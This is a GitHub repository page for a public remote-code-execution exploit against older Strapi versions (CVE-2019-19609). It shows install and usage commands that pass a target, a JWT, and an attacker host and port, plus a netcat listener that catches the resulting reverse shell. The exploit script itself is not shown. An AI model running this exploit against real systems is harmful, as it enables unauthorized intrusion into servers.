Skip to content
/ CVE-2019-19609-EXPLOIT Public

Exploit for CVE-2019-19609 in Strapi (Remote Code Execution)

9 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

diego-tella/CVE-2019-19609-EXPLOIT

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

CVE-2019-19609-EXPLOIT

Exploit for CVE-2019-19609 in Strapi (Remote code execution in strapi-3.0.0-beta.17.7 or earlier).
I was faced with a scenario with this vulnerability, but without a public exploit. I decided to create my own and share it here.

Instalation

git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT

Usage

cd CVE-2019-19609-EXPLOIT
python exploit.py -d DOMAIN_OR_IP -jwt JSON_WEB_TOKEN -l LHOST -p LPORT

python exploit.py -d example.com -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMjU3NDc3LCJleHAiOjE2MzI4NDk0Nzd9.JIKHRz_EDXg1fhThRhIbIyZ9w-6mE01dhnno2AtMMU0 -l 10.10.14.86 -p 1221

On another terminal, starts listening to the port passed in the exploit

nc -vnlp 1221

About

Exploit for CVE-2019-19609 in Strapi (Remote Code Execution)

Resources

Readme
Activity

Stars

9 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages